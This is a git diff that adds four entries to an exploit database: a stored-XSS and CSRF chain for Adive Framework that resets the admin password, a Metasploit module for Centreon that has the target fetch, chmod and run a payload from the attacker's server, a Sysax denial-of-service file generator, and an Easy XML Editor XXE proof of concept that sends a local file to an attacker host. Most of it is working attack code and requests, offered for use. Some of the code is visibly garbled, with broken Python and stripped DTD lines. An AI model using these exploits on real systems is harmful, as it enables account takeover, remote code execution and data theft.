diff --git a/exploits/php/webapps/47946.txt b/exploits/php/webapps/47946.txt
new file mode 100644
index 000000000..398a24b1e
--- /dev/null
+++ b/exploits/php/webapps/47946.txt
@@ -0,0 +1,88 @@
+# Exploit Title: Adive Framework 2.0.8 - Persistent Cross-Site Scripting
+# Exploit Author: Sarthak Saini
+# Dork: N/A
+# Date: 2020-01-18
+# Vendor Link : https://www.adive.es/
+# Software Link: https://github.com/ferdinandmartin/adive-php7
+# Version: 2.0.8
+# Category: Webapps
+# Tested on: windows64bit / mozila firefox
+
+1) Persistent Cross-site Scripting at user add page
+
+Description : The parameter 'userUsername=' is vulnerable to Stored Cross-site scripting
+
+Payload:-
+
+POST /admin/user/add HTTP/1.1
+Host: 192.168.2.5
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 62
+Origin: http://192.168.2.5
+DNT: 1
+Connection: close
+Referer: http://192.168.2.5/admin/user/add
+Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
+Upgrade-Insecure-Requests: 1
+
+userName=test&userUsername=&pass=test&cpass=test&permission=3
+
+
+|----------------------------------------------------------------------------------
+
+
+2) account takeover - cross side request forgery
+
+
+Description : attacker can craft a malicious javascript and attach it to the stored xss, when admin visits the /admin/user page the payload will trigger.
+
+-> Save the payload as exp.js
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-
+function execute()
+{
+ var nuri ="http://192.168.2.5/admin/config";
+ xhttp = new XMLHttpRequest();
+ xhttp.open("POST", nuri, true);
+ xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+ xhttp.withCredentials = "true";
+ var body = "";
+ body += "\r\n\r\n";
+ body +=
+ "userName=Administrator&confPermissions=1&pass=hacked@123&cpass=hacked@123&invokeType=web";
+ xhttp.send(body);
+ return true;
+}
+
+execute();
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-
+
+-> Start a server and host the exp.js. Send the exp.js file in the xss payload
+
+Payload:-
+
+POST /admin/user/add HTTP/1.1
+Host: 192.168.2.5
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 143
+Origin: http://192.168.2.5
+DNT: 1
+Connection: close
+Referer: http://192.168.2.5/admin/user/add
+Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
+Upgrade-Insecure-Requests: 1
+
+userName=%3Cscript+src%3D%22http%3A%2F%2F192.168.2.5%2Fexp.js%22%3E%3C%2Fscript%3E&userUsername=test&pass=test&cpass=test&permission=3
+
+
+-> As soon as admin will visit the page the payload will be triggered and the admin password will be changed to hacked@123
+
+|-----------------------------------------EOF-----------------------------------------
\ No newline at end of file
diff --git a/exploits/php/webapps/47948.rb b/exploits/php/webapps/47948.rb
new file mode 100755
index 000000000..07edb76aa
--- /dev/null
+++ b/exploits/php/webapps/47948.rb
@@ -0,0 +1,185 @@
+####################################################################
+# This module requires Metasploit: https://metasploit.com/download #
+# Current source: https://github.com/rapid7/metasploit-framework #
+####################################################################
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::HttpServer::HTML
+ include Msf::Exploit::EXE
+
+ def initialize(info = {})
+ super(update_info(info,
+ "Name" => "Centreon Authenticated Macro Expression Location Setting Handler Code Execution",
+ "Description" => %q{
+ Authenticated Remote Code Execution on Centreon Web Appliances.
+ Affected versions: =< 18.10, 19.04
+ By amending the Macros Expression's default directory to / we are able to execute system commands and obtain a shell as user Apache.
+ Vendor verified: 09/17/2019
+ Vendor patched: 10/16/2019
+ Public disclosure: 10/18/2019
+ },
+ "License" => MSF_LICENSE,
+ 'Author' => [
+ 'TheCyberGeek', # Discovery
+ 'enjloezz' # Discovery and Metasploit Module
+ ],
+ 'References' =>
+ [
+ ['URL','https://github.com/centreon/centreon/pull/7864'],
+ ['CVE','2019-16405']
+ ],
+ "Platform" => "linux",
+ "Targets" => [
+ ["Centreon", {}],
+ ],
+ "Stance" => Msf::Exploit::Stance::Aggressive,
+ "Privileged" => false,
+ "DisclosureDate" => "Oct 19 2019",
+ "DefaultOptions" => {
+ "SRVPORT" => 80,
+ },
+ "DefaultTarget" => 0
+ ))
+
+ register_options(
+ [
+ OptString.new("TARGETURI", [true, "The URI of the Centreon Application", "/centreon"]),
+ OptString.new("USERNAME", [true, "The Username of the Centreon Application", "admin"]),
+ OptString.new("PASSWORD", [true, "The Password of the Centreon Application", ""]),
+ OptString.new("TARGETS", [true, "The method used to download shell from target (default is curl)", "curl"]),
+ OptInt.new("HTTPDELAY", [false, "Number of seconds the web server will wait before termination", 10]),
+ ]
+ )
+ end
+
+ def exploit
+ begin
+ res = send_request_cgi(
+ "uri" => normalize_uri(target_uri.path, "index.php"),
+ "method" => "GET",
+ )
+ @phpsessid = res.get_cookies
+ /centreon_token\".*value=\"(?.*?)\"/ =~ res.body
+
+ unless token
+ vprint_error("Couldn't get token, check your TARGETURI")
+ return
+ end
+ res = send_request_cgi!(
+ "uri" => normalize_uri(target_uri.path, "index.php"),
+ "method" => "POST",
+ "cookie" => @phpsessid,
+ "vars_post" => {
+ "useralias" => datastore["USERNAME"],
+ "password" => datastore["PASSWORD"],
+ "centreon_token" => token,
+ },
+ )
+ unless res.body.include? "You need to enable JavaScript to run this app"
+ fail_with Failure::NoAccess "Cannot login to Centreon"
+ end
+ print_good("Login Successful!")
+ res = send_request_cgi(
+ "uri" => normalize_uri(target_uri.path, "main.get.php"),
+ "method" => "GET",
+ "cookie" => @phpsessid,
+ "vars_get" => {
+ "p" => "60904",
+ "o" => "c",
+ "resource_id" => 1,
+ },
+ )
+ /centreon_token\".*value=\"(?.*?)\"/ =~ res.body
+ res = send_request_cgi(
+ "uri" => normalize_uri(target_uri.path, "main.get.php"),
+ "vars_get" => {
+ "p" => "60904",
+ },
+ "method" => "POST",
+ "cookie" => @phpsessid,
+ "vars_post" => {
+ "resource_name": "$USER1$",
+ "resource_line": "/",
+ "instance_id": 1,
+ "resource_activate": 1,
+ "resource_comment": "Nagios Plugins Path",
+ "submitC": "Save",
+ "resource_id": 1,
+ "o": "c",
+ "initialValues": "" "a:0:{}" "",
+ "centreon_token": token
+ },
+ )
+ begin
+ Timeout.timeout(datastore["HTTPDELAY"]) { super }
+ rescue Timeout::Error
+ vprint_error("Server Timed Out...")
+ end
+ rescue ::Rex::ConnectionError
+ vprint_error("Connection error...")
+ end
+ end
+
+ def primer
+ @pl = generate_payload_exe
+ @path = service.resources.keys[0]
+ binding_ip = srvhost_addr
+
+ proto = ssl ? "https" : "http"
+ payload_uri = "#{proto}://#{binding_ip}:#{datastore["SRVPORT"]}/#{@path}"
+ send_payload(payload_uri)
+ end
+
+ def send_payload(payload_uri)
+ payload = "/bin/bash -c \"" + ( datastore["method"] == "curl" ? ("curl #{payload_uri} -o") : ("wget #{payload_uri} -O") ) + " /tmp/#{@path}\""
+ print_good("Sending Payload")
+ send_request_cgi(
+ "uri" => normalize_uri(target_uri.path, "main.get.php"),
+ "method" => "POST",
+ "cookie" => @phpsessid,
+ "vars_get" => { "p": "60801", "command_hostaddress": "", "command_example": "", "command_line": payload, "o": "p", "min": 1 },
+ )
+ end
+
+ def on_request_uri(cli, req)
+ print_good("#{peer} - Payload request received: #{req.uri}")
+ send_response(cli, @pl)
+ run_shell
+ stop_service
+ end
+
+ def run_shell
+ print_good("Setting permissions for the payload")
+ res = send_request_cgi(
+ "uri" => normalize_uri(target_uri.path, "main.get.php"),
+ "method" => "POST",
+ "cookie" => @phpsessid,
+ "vars_get" => {
+ "p": "60801",
+ "command_hostaddress": "",
+ "command_example": "",
+ "command_line": "/bin/bash -c \"chmod 777 /tmp/#{@path}\"",
+ "o": "p",
+ "min": 1,
+ },
+ )
+
+ print_good("Executing Payload")
+ res = send_request_cgi(
+ "uri" => normalize_uri(target_uri.path, "main.get.php"),
+ "method" => "POST",
+ "cookie" => @phpsessid,
+ "vars_get" => {
+ "p": "60801",
+ "command_hostaddress": "",
+ "command_example": "",
+ "command_line": "/tmp/#{@path}",
+ "o": "p",
+ "min": 1,
+ },
+ )
+ end
+end
\ No newline at end of file
diff --git a/exploits/windows/dos/47947.py b/exploits/windows/dos/47947.py
new file mode 100755
index 000000000..96c19033e
--- /dev/null
+++ b/exploits/windows/dos/47947.py
@@ -0,0 +1,27 @@
+# Exploit Title: Sysax Multi Server 5.50 - Denial of Service (PoC)
+# Google Dork: NA
+# Date: 2020-01-20
+# Exploit Author: Shailesh Kumavat
+# Vendor Homepage: https://www.sysax.com/
+# Software Link: https://www.sysax.com/download.htm#sysaxserv
+# Version: Sysax Multi Server 5.50
+# Tested on: WIndow 7
+# CVE : [if applicable]
+
+1) Download software install in window 7
+2)run software then click install license
+3) upload crash.key file and it will show run again this program
+4 ) program crash , never run
+
+
+#!/usr/bin/python
+
+buffer = "A" * 1000
+
+payload = buffertry:
+ f=open("crash.key","w")
+ print("[+] Creating %s bytes evil payload." %len(payload))
+ f.write(payload)
+ f.close()
+ print("[+] File created!")except:
+ print("File cannot be created.")
\ No newline at end of file
diff --git a/exploits/xml/local/47945.txt b/exploits/xml/local/47945.txt
new file mode 100644
index 000000000..5c948f80d
--- /dev/null
+++ b/exploits/xml/local/47945.txt
@@ -0,0 +1,61 @@
+# Exploit Title: Easy XML Editor 1.7.8 - XML External Entity Injection
+# Exploit Author: Javier Olmedo
+# Date: 2018-11-21
+# Vendor: Richard Wuerflein
+# Software Link: https://www.edit-xml.com/Easy_XML_Editor.exe
+# Affected Version: 1.7.8 and before
+# Patched Version: unpatched
+# Category: Local
+# Platform: XML
+# Tested on: Windows 10 Pro
+# CWE: https://cwe.mitre.org/data/definitions/611.html
+# CVE: 2019-19031
+# References:
+# https://hackpuntes.com/cve-2019-19031-easy-xml-editor-1-7-8-inyeccion-xml/
+
+# 1. Technical Description
+# Easy XML Editor version 1.7.8 and before are affected by XML External Entity Injection vulnerability
+# through the malicious XML file. This allows a malicious user to read arbitrary files.
+
+# 2. Proof Of Concept (PoC)
+# 2.1 Start a webserver to receive the connection.
+
+python -m SimpleHTTPServer 80
+
+# 2.2 Upload the payload.dtd file to your web server.
+
+
+">
+%all;
+
+# 2.3 Create a SECRET.TXT file with any content in desktop.
+
+# 2.4 Open poc.xml
+
+
+\Desktop\secret.txt">
+
+%dtd;]>
+&send;
+
+# 2.5 Your web server will receive a request with the contents of the secret.txt file
+
+Serving HTTP on 0.0.0.0 port 8000 ...
+192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /payload.dtd HTTP/1.1" 200 -
+192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /?THIS%20IS%20A%20SECRET%20FILE HTTP/1.1" 200 -
+
+# 3. Timeline
+# 13, november 2019 - [RESEARCHER] Discover
+# 13, november 2019 - [RESEARCHER] Report to vendor support
+# 14, november 2019 - [DEVELOPER] Unrecognized vulnerability
+# 15, november 2019 - [RESEARCHER] Detailed vulnerability report
+# 22, november 2019 - [RESEARCHER] Public disclosure
+
+# 4. Disclaimer
+# The information contained in this notice is provided without any guarantee of use or otherwise.
+# The redistribution of this notice is explicitly permitted for insertion into vulnerability
+# databases, provided that it is not modified and due credit is granted to the author.
+# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
+# All content (c)
+# Javier Olmedo
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 693f9e61d..e6dc0411e 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6659,6 +6659,7 @@ id,file,description,date,author,type,platform,port
47921,exploits/android/dos/47921.txt,"Android - ashmem Readonly Bypasses via remap_file_pages() and ASHMEM_UNPIN",2020-01-14,"Google Security Research",dos,android,
47937,exploits/windows/dos/47937.py,"APKF Product Key Finder 2.5.8.0 - 'Name' Denial of Service (PoC)",2020-01-17,"Ismail Tasdelen",dos,windows,
47942,exploits/windows/dos/47942.py,"GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC)",2020-01-17,"Ismail Tasdelen",dos,windows,
+47947,exploits/windows/dos/47947.py,"Sysax Multi Server 5.50 - Denial of Service (PoC)",2020-01-20,"Shailesh Kumavat",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10911,6 +10912,7 @@ id,file,description,date,author,type,platform,port
47940,exploits/windows/local/47940.txt,"Trend Micro Maximum Security 2019 - Arbitrary Code Execution",2020-01-17,hyp3rlinx,local,windows,
47943,exploits/windows/local/47943.txt,"Trend Micro Maximum Security 2019 - Privilege Escalation",2020-01-17,hyp3rlinx,local,windows,
47944,exploits/windows/local/47944.rb,"Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (Metasploit)",2020-01-17,Metasploit,local,windows,
+47945,exploits/xml/local/47945.txt,"Easy XML Editor 1.7.8 - XML External Entity Injection",2020-01-20,"Javier Olmedo",local,xml,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42245,3 +42247,5 @@ id,file,description,date,author,type,platform,port
47934,exploits/php/webapps/47934.txt,"Rukovoditel Project Management CRM 2.5.2 - 'filters' SQL Injection",2020-01-16,"Fatih Çelik",webapps,php,
47939,exploits/php/webapps/47939.py,"Wordpress Plugin InfiniteWP Client 1.9.4.5 - Authentication Bypass",2020-01-17,"Raphael Karger",webapps,php,
47941,exploits/php/webapps/47941.py,"Wordpress Time Capsule Plugin 1.21.16 - Authentication Bypass",2020-01-17,"B. Canavate",webapps,php,
+47946,exploits/php/webapps/47946.txt,"Adive Framework 2.0.8 - Persistent Cross-Site Scripting",2020-01-20,"Sarthak Saini",webapps,php,
+47948,exploits/php/webapps/47948.rb,"Centreon 19.04 - Authenticated Remote Code Execution (Metasploit)",2020-01-20,TheCyberGeek,webapps,php,